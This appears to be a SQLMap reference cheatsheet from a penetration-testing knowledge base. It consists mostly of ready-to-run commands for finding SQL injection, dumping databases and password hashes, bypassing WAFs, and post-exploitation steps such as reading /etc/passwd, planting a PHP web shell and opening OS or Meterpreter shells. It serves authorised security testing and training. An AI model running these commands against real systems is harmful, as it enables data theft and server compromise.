SQLMap Cheatsheet

Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It supports a wide range of database management systems and injection techniques.

Core Syntax

sqlmap [options] -u "URL" 
sqlmap [options] -r request.txt

Learning Workflow

Phase 1: Detection — Identify injectable parameters Phase 2: Enumeration — Map the database structure Phase 3: Extraction — Retrieve data from targets Phase 4: Advanced — Evasion, optimisation, and post-exploitation

Phase 1: Detection & Basic Testing

Target Specification

# URL with parameter (mark injectable param with *)
sqlmap -u "http://target.com/page.php?id=1"
sqlmap -u "http://target.com/page.php?id=1*&category=2"

# From Burp/ZAP saved request file
sqlmap -r request.txt

# Parse targets from sitemap
sqlmap -x "http://target.com/sitemap.xml"

# Direct database connection (for post-exploitation)
sqlmap -d "mysql://user:pass@target:3306/dbname"

Request Methods

# POST data
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test"

# Specify parameter to test
sqlmap -u "http://target.com/page.php?id=1&cat=2" -p id

# Test all parameters
sqlmap -u "http://target.com/page.php?id=1&cat=2" --level=5

# Cookie injection
sqlmap -u "http://target.com/page.php" --cookie="session=abc123; id=1*"

# Header injection
sqlmap -u "http://target.com/page.php" --headers="X-Forwarded-For: 127.0.0.1*"

# User-Agent injection
sqlmap -u "http://target.com/page.php" --user-agent="test" --level=3

Detection Options

# Increase detection level (1-5, default 1)
# Higher = more payloads, more parameters tested
sqlmap -u "URL" --level=3

# Increase risk level (1-3, default 1)
# Higher = more aggressive payloads (OR-based, heavy queries)
sqlmap -u "URL" --risk=3

# Full detection
sqlmap -u "URL" --level=5 --risk=3

# Test specific injection techniques
sqlmap -u "URL" --technique=BEUSTQ

Injection Techniques (`--technique`)

Letter

Technique

Description

B

Boolean-based blind

Infers data from true/false responses

E

Error-based

Extracts data from error messages

U

Union query-based

Uses UNION SELECT to retrieve data

S

Stacked queries

Executes multiple statements (;)

T

Time-based blind

Infers data from response delays

Q

Inline queries

Nested queries within other statements

# Test only union and error-based
sqlmap -u "URL" --technique=UE

# Test only blind techniques
sqlmap -u "URL" --technique=BT

Quick Detection Scan

# Fast detection, minimal output
sqlmap -u "http://target.com/page.php?id=1" --batch --smart

# Detect and identify DBMS only
sqlmap -u "URL" --fingerprint

# Check if parameter is injectable (no exploitation)
sqlmap -u "URL" --is-dba

Phase 2: Enumeration

Database Fingerprinting

# Identify DBMS
sqlmap -u "URL" --fingerprint

# Force specific DBMS (skip detection)
sqlmap -u "URL" --dbms=mysql
sqlmap -u "URL" --dbms=mssql
sqlmap -u "URL" --dbms=postgresql
sqlmap -u "URL" --dbms=oracle
sqlmap -u "URL" --dbms=sqlite

Information Gathering

# Get current user
sqlmap -u "URL" --current-user

# Get current database
sqlmap -u "URL" --current-db

# Check if current user is DBA
sqlmap -u "URL" --is-dba

# Get server hostname
sqlmap -u "URL" --hostname

# List all users
sqlmap -u "URL" --users

# List all databases
sqlmap -u "URL" --dbs

# Get DBMS banner
sqlmap -u "URL" --banner

Schema Enumeration

# List tables in a database
sqlmap -u "URL" -D database_name --tables

# List columns in a table
sqlmap -u "URL" -D database_name -T table_name --columns

# Count rows in table
sqlmap -u "URL" -D database_name -T table_name --count

# Full schema dump
sqlmap -u "URL" --schema

Standard Enumeration Workflow

# Step 1: List databases
sqlmap -u "URL" --dbs --batch

# Step 2: List tables in target database
sqlmap -u "URL" -D targetdb --tables --batch

# Step 3: List columns in target table
sqlmap -u "URL" -D targetdb -T users --columns --batch

# Step 4: Dump specific columns
sqlmap -u "URL" -D targetdb -T users -C username,password --dump --batch

Phase 3: Data Extraction

Dumping Data

# Dump entire table
sqlmap -u "URL" -D database -T table --dump

# Dump specific columns
sqlmap -u "URL" -D database -T table -C col1,col2 --dump

# Dump all tables in database
sqlmap -u "URL" -D database --dump-all

# Dump everything (all databases)
sqlmap -u "URL" --dump-all

# Limit rows returned
sqlmap -u "URL" -D db -T table --dump --start=1 --stop=100

# Dump with condition
sqlmap -u "URL" -D db -T table --dump --where="id>100"

Password Handling

# Dump passwords and attempt to crack
sqlmap -u "URL" --passwords

# Dump user password hashes
sqlmap -u "URL" -D db -T users -C password --dump

# Don't crack hashes (just dump)
sqlmap -u "URL" --passwords --no-crack

Search Functions

# Search for databases containing keyword
sqlmap -u "URL" --search -D admin

# Search for tables containing keyword
sqlmap -u "URL" --search -T user

# Search for columns containing keyword
sqlmap -u "URL" --search -C password

# Combined search
sqlmap -u "URL" --search -C email,pass,credit

Output Formats

# Output to CSV
sqlmap -u "URL" -D db -T table --dump --csv-del=";"

# Output directory
sqlmap -u "URL" --output-dir=/path/to/output

# Save traffic to HAR file
sqlmap -u "URL" --har=traffic.har

Phase 4: Advanced Techniques

Authentication

# Basic auth
sqlmap -u "URL" --auth-type=basic --auth-cred="user:pass"

# Digest auth
sqlmap -u "URL" --auth-type=digest --auth-cred="user:pass"

# NTLM auth
sqlmap -u "URL" --auth-type=ntlm --auth-cred="domain\\user:pass"

# Cookie-based session
sqlmap -u "URL" --cookie="PHPSESSID=abc123"

# Load cookies from file
sqlmap -u "URL" --load-cookies=cookies.txt

Proxy & Traffic

# Route through proxy
sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

# Proxy with auth
sqlmap -u "URL" --proxy="http://127.0.0.1:8080" --proxy-cred="user:pass"

# Route through Tor
sqlmap -u "URL" --tor --tor-type=SOCKS5

# Check Tor connection
sqlmap -u "URL" --tor --check-tor

Evasion Techniques

# Tamper scripts (modify payloads to bypass WAF/filters)
sqlmap -u "URL" --tamper=space2comment

# Multiple tamper scripts
sqlmap -u "URL" --tamper="space2comment,between,randomcase"

# Random User-Agent
sqlmap -u "URL" --random-agent

# Delay between requests (seconds)
sqlmap -u "URL" --delay=2

# Randomise delay
sqlmap -u "URL" --randomize=id

# Safe URL (visit between injections to stay logged in)
sqlmap -u "URL" --safe-url="http://target.com/home.php" --safe-freq=3

Common Tamper Scripts

Script

Purpose

space2comment

Replace spaces with /**/

space2plus

Replace spaces with +

space2randomblank

Replace spaces with random whitespace

between

Replace > with NOT BETWEEN 0 AND

randomcase

Randomize character case

charencode

URL-encode characters

base64encode

Base64 encode payload

equaltolike

Replace = with LIKE

greatest

Replace > with GREATEST

apostrophemask

Replace ' with UTF-8 equivalent

percentage

Add % between characters

# List all tamper scripts
sqlmap --list-tampers

# WAF bypass combination
sqlmap -u "URL" --tamper="space2comment,randomcase,between" --random-agent

Performance Optimization

# Number of threads (1-10)
sqlmap -u "URL" --threads=10

# Optimise for speed (combines multiple flags)
sqlmap -u "URL" -o

# Predict common values
sqlmap -u "URL" --predict-output

# Keep connection alive
sqlmap -u "URL" --keep-alive

# Null connection (for blind SQLi bandwidth saving)
sqlmap -u "URL" --null-connection

# Set timeout
sqlmap -u "URL" --timeout=30

Post-Exploitation

File System Access

# Read file from server
sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-read="C:/Windows/win.ini"

# Write file to server
sqlmap -u "URL" --file-write="local_shell.php" --file-dest="/var/www/html/shell.php"

# Upload file
sqlmap -u "URL" --file-write="payload.exe" --file-dest="C:/temp/payload.exe"

OS Command Execution

# Interactive OS shell
sqlmap -u "URL" --os-shell

# Execute single command
sqlmap -u "URL" --os-cmd="whoami"

# Spawn Meterpreter/VNC session
sqlmap -u "URL" --os-pwn

# Windows registry access
sqlmap -u "URL" --reg-read

Database Interaction

# Interactive SQL shell
sqlmap -u "URL" --sql-shell

# Execute SQL query
sqlmap -u "URL" --sql-query="SELECT user()"

# Execute SQL from file
sqlmap -u "URL" --sql-file=queries.sql

Privilege Escalation

# Attempt privilege escalation
sqlmap -u "URL" --priv-esc

# UDF injection (MySQL/PostgreSQL)
sqlmap -u "URL" --udf-inject

Workflow Examples

Full Assessment Workflow

# 1. Initial detection
sqlmap -u "http://target.com/page.php?id=1" --batch --smart

# 2. Deep detection if initial fails
sqlmap -u "http://target.com/page.php?id=1" --level=5 --risk=3 --batch

# 3. Enumerate after confirmed injectable
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch

# 4. Target specific database
sqlmap -u "http://target.com/page.php?id=1" -D webapp --tables --batch

# 5. Extract high-value data
sqlmap -u "http://target.com/page.php?id=1" -D webapp -T users --dump --batch

# 6. Check for system access
sqlmap -u "http://target.com/page.php?id=1" --is-dba --batch
sqlmap -u "http://target.com/page.php?id=1" --os-shell

Testing From Burp Request

# 1. Save request from Burp to file
# 2. Mark injection point with *
# 3. Run SQLMap
sqlmap -r request.txt --batch --level=3

# With specific parameter
sqlmap -r request.txt -p "productId" --batch

WAF Bypass Workflow

# 1. Initial test (likely blocked)
sqlmap -u "URL" --batch

# 2. Add evasion
sqlmap -u "URL" --tamper=space2comment --random-agent --batch

# 3. Increase evasion
sqlmap -u "URL" --tamper="space2comment,between,randomcase" \
    --random-agent --delay=2 --batch

# 4. Try different technique
sqlmap -u "URL" --technique=T --tamper="space2comment,charencode" \
    --random-agent --delay=3 --batch

Session Management

# Save session data
sqlmap -u "URL" --output-dir=/path/to/output

# Resume previous session
sqlmap -u "URL" --resume

# Flush session (start fresh)
sqlmap -u "URL" --flush-session

# Session file location
# Default: ~/.local/share/sqlmap/output/

Useful Flag Combinations

Quick Detection

sqlmap -u "URL" --batch --smart

Stealth Mode

sqlmap -u "URL" --random-agent --delay=3 --tamper=space2comment \
    --technique=BT --batch

Maximum Detection

sqlmap -u "URL" --level=5 --risk=3 --threads=10 --batch

Full Dump

sqlmap -u "URL" -D database --dump-all --threads=5 --batch

Through Burp Proxy

sqlmap -u "URL" --proxy="http://127.0.0.1:8080" --batch

Quick Reference Card

Task

Command

Basic test

sqlmap -u "URL" --batch

From request file

sqlmap -r req.txt --batch

List databases

sqlmap -u "URL" --dbs

List tables

sqlmap -u "URL" -D db --tables

List columns

sqlmap -u "URL" -D db -T tbl --columns

Dump table

sqlmap -u "URL" -D db -T tbl --dump

Get shell

sqlmap -u "URL" --os-shell

SQL shell

sqlmap -u "URL" --sql-shell

Current user

sqlmap -u "URL" --current-user

Check DBA

sqlmap -u "URL" --is-dba

Read file

sqlmap -u "URL" --file-read="/etc/passwd"

Use proxy

sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

Bypass WAF

sqlmap -u "URL" --tamper=space2comment --random-agent

Max detection

sqlmap -u "URL" --level=5 --risk=3

Common Issues & Fixes

Issue

Solution

No injection found

Increase --level and --risk

WAF blocking

Add --tamper scripts and --random-agent

Session timeout

Use --safe-url with --safe-freq

Slow extraction

Increase --threads, use --technique=E,U

False positives

Use --string or --regexp to define true condition

HTTPS errors

Add --force-ssl

Connection issues

Adjust --timeout and --retries

PreviousLinux Find Command Cheatsheet NextVolatility 3 Memory Forensics Cheatsheet

Last updated 1 hour ago